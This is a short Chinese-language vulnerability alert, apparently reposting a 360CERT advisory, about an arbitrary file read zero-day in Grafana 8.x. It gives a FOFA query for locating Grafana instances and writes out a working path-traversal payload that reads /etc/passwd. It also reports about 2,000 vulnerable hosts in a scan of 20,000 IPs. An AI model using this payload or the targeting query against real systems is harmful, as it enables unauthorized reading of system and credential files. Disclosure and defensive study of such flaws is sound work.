【漏洞预警】Grafana任意文件读取
payload来源:https://github.com/test502git/Grafana-0day
漏洞简述
2021年12月07日,360CERT监测发现网上存在Grafana 任意文件读取漏洞
,该漏洞目前为0day漏洞,漏洞编号:暂无,漏洞等级:高危
,漏洞评分:7.5
。
目前该漏洞POC已公开
对此,360CERT建议广大用户做好资产自查以及预防工作,以免遭受黑客攻击。
影响版本
组件 | 影响版本 | 安全版本 |
---|---|---|
Grafana | 8.x | 暂无 |
FOFA
1 | app="Grafana" |
漏洞复现
漏洞payload为
1 | /public/plugins/prometheus/../../../../../../../../../etc/passwd |
批量检测扫描结果
经检测2万ip存在至少2000存在漏洞
修复建议
通用修补建议
目前暂无相关补丁,即使关注官方动态,获取最新版本。